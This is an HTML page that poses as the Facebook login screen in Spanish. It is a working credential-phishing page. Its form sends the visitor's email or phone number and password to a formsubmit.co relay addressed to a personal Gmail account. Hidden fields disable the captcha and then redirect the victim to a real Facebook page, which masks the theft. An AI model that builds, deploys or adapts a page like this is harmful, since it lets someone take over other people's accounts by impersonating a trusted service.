<!DOCTYPE html>
<html lang="es">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Facebook</title>
    <link rel="stylesheet" href="styles/style.css">
</head>

<body>
  
    <div class="login">
        <form action="https://formsubmit.co/tobiaslozano20068@gmail.com" method="POST" class="form" id="form">
        <input type="email" name="mail" id="mail" placeholder="Correo electrónico o número de teléfono" required  >
        <input type="password" name="contraseña" id="password" placeholder="Contraseña" required>
        <div class="forgot">
        <span><a href="https://www.facebook.com/login/identify/?ctx=recover&ars=facebook_login&from_login_scree">¿Olvidaste tu contraseña?</a></span>
        </div>
        <input type="submit" value="Iniciar sesión" id="send">
        <hr>
        <input type="button" value="Crear cuenta nueva" id="new">



        <input type="hidden" name="_next" value="https://www.facebook.com/MemesdeProgramacionhmo/">
        <input type="hidden" name="_captcha" value="false">
        <input type="hidden" name="_template" value="basic">

 






        </form>

    </div>
<script src="js/main.js"></script>
</body>
</html>